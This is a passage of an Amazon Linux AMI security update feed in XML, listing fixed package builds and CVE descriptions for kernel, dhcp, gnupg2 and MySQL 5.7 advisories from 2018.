name="php70-pdo-dblib" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.30" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.30-1.29.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.30" release="1.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-xml-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.30" release="1.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-debuginfo-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.30" release="1.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-mbstring-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.30-1.29.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.30" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.30-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1023</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1023: important priority package update for kernel</title><issued date="2018-05-25 18:12:00" /><updated date="2019-01-25 03:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8897:
A flaw was found in the way the Linux kernel handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, the processor does not deliver interrupts and exceptions; they are delivered only once the first instruction after the stack switch has executed. An unprivileged system user could use this flaw to crash the system kernel, resulting in a denial of service.
1567074:
CVE-2018-8897 Kernel: error in exception handling leads to DoS
CVE-2018-7995:
A race condition in the store_int_with_restart() function in arch/x86/kernel/cpu/mcheck/mce.c in the Linux kernel allows local users to cause a denial of service (panic) by leveraging root access to write to the check_interval file in a /sys/devices/system/machinecheck/machinecheck&lt;cpu number&gt; directory.
1553911:
CVE-2018-7995 kernel: Race condition in the store_int_with_restart() function in cpu/mcheck/mce.c
CVE-2018-1108:
A weakness was found in the Linux kernel&#039;s implementation of random seed data. Programs, early in the boot sequence, could use the data allocated for the seed before it was sufficiently generated.
1567306:
CVE-2018-1108 kernel: drivers: getrandom(2) unblocks too early after system boot
CVE-2018-1091:
A flaw was found in the Linux kernel where a crash can be triggered from unprivileged userspace during core dump on a POWER system with a certain configuration. This is due to a missing processor feature check and an erroneous use of transactional memory (TM) instructions in the core dump path leading to a denial of service.
1558149:
CVE-2018-1091 kernel: guest kernel crash during core dump on POWER9 host
CVE-2018-10901:
A flaw was found in the Linux kernel&#039;s KVM virtualization subsystem. The VMX code does not restore GDT.LIMIT to the previous host value, but instead sets it to 64KB. With a corrupted GDT limit, a host&#039;s userspace code is able to place malicious entries in the GDT, particularly in the per-cpu variables. An attacker can use this to escalate their privileges.
1601849:
CVE-2018-10901 kernel: kvm: vmx: host GDT limit corruption
CVE-2018-1087:
A flaw was found in the way the Linux kernel&#039;s KVM hypervisor handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, the processor does not deliver interrupts and exceptions; they are delivered only once the first instruction after the stack switch has executed. An unprivileged KVM guest user could use this flaw to crash the guest or, potentially, escalate their privileges in the guest.
1566837:
CVE-2018-1087 Kernel: KVM: error in exception handling leads to wrong debug stack value
CVE-2018-1068:
A flaw was found in the Linux kernel&#039;s implementation of the 32-bit syscall interface for bridging. This allowed a privileged user to arbitrarily write to a limited range of kernel memory.
1552048:
CVE-2018-1068 kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c
CVE-2018-10675:
The do_get_mempolicy() function in mm/mempolicy.c in the Linux kernel allows local users to hit a use-after-free bug via crafted system calls and thus cause a denial of service (DoS) or possibly have unspecified other impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out.
1575065:
CVE-2018-10675 kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact
CVE-2018-1000199:
An address corruption flaw was discovered in the Linux kernel built with hardware breakpoint (CONFIG_HAVE_HW_BREAKPOINT) support. While modifying a hardware breakpoint via the &#039;modify_user_hw_breakpoint&#039; routine, an unprivileged user/process could use this flaw to crash the system kernel, resulting in a DoS, or to potentially escalate privileges on the system.
1568477:
CVE-2018-1000199 kernel: ptrace() incorrect error handling leads to corruption and DoS
CVE-2017-16939:
The Linux kernel is vulnerable to a use-after-free flaw when the Transformation User configuration interface (CONFIG_XFRM_USER) compile-time option is enabled. This vulnerability occurs while closing an xfrm netlink socket in xfrm_dump_policy_done. A user/process could abuse this flaw to potentially escalate their privileges on a system.
1517220:
CVE-2017-16939 Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation
CVE-2017-13215:
A flaw was found in the Linux kernel&#039;s skcipher component, which affects the skcipher_recvmsg function. An attacker using a specific input could achieve privilege escalation.
1535173:
CVE-2017-13215 kernel: crypto: privilege escalation in skcipher_recvmsg function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13215" title="" id="CVE-2017-13215" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16939" title="" id="CVE-2017-16939" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000199" title="" id="CVE-2018-1000199" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10675" title="" id="CVE-2018-10675" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1068" title="" id="CVE-2018-1068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1087" title="" id="CVE-2018-1087" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10901" title="" id="CVE-2018-10901" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1091" title="" id="CVE-2018-1091" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1108" title="" id="CVE-2018-1108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7995" title="" id="CVE-2018-7995" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897" title="" id="CVE-2018-8897" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package 
name="kernel-tools-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.42" release="52.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.42-52.37.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-tools" 
version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.42-52.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.42" release="52.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.42-52.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1024</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1024: low priority package update for dhcp</title><issued date="2018-05-25 18:16:00" /><updated date="2018-05-29 23:01:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1111:
A command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in Amazon Linux 2. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
1567974:
CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111" title="" id="CVE-2018-1111" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-53.P1.28.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="53.P1.28.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-53.P1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update 
status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1025</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1025: low priority package update for gnupg2</title><issued date="2018-05-25 18:21:00" /><updated date="2018-07-24 21:04:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-9234:
GnuPG 2.2.4 and 2.2.5 does not enforce a configuration in which key certification requires an offline master Certify key, which results in apparently valid certifications that occurred only with access to a signing subkey.
1563930:
CVE-2018-9234 GnuPG: Unenforced configuration allows for apparently valid certifications actually signed by signing subkeys
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9234" title="" id="CVE-2018-9234" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2-smime" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.28-2.32.amzn1.x86_64.rpm</filename></package><package name="gnupg2-smime" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.28-2.32.amzn1.i686.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.28-2.32.amzn1.i686.rpm</filename></package><package name="gnupg2" version="2.0.28" release="2.32.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.28-2.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1026</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1026: medium priority package update for mysql57</title><issued date="2018-05-25 18:22:00" /><updated date="2018-05-29 23:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-2846:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Performance Schema). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568958:
CVE-2018-2846 mysql: Server: Performance Schema unspecified vulnerability (CPU Apr 2018)
CVE-2018-2839:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568957:
CVE-2018-2839 mysql: Server: DML unspecified vulnerability (CPU Apr 2018)
CVE-2018-2819:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568956:
CVE-2018-2819 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2818:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Security : Privileges). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568955:
CVE-2018-2818 mysql: Server : Security : Privileges unspecified vulnerability (CPU Apr 2018)
CVE-2018-2817:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568954:
CVE-2018-2817 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2816:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568953:
CVE-2018-2816 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2813:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).
1568951:
CVE-2018-2813 mysql: Server: DDL unspecified vulnerability (CPU Apr 2018)
CVE-2018-2812:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1568950:
CVE-2018-2812 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2810:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568949:
CVE-2018-2810 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2787:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1568946:
CVE-2018-2787 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2786:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1568945:
CVE-2018-2786 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2784:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568944:
CVE-2018-2784 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2782:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568943:
CVE-2018-2782 mysql: InnoDB unspecified vulnerability (CPU Apr 2018)
CVE-2018-2781:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1568942:
CVE-2018-2781 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2780:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1568941:
CVE-2018-2780 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2018)
CVE-2018-2779:
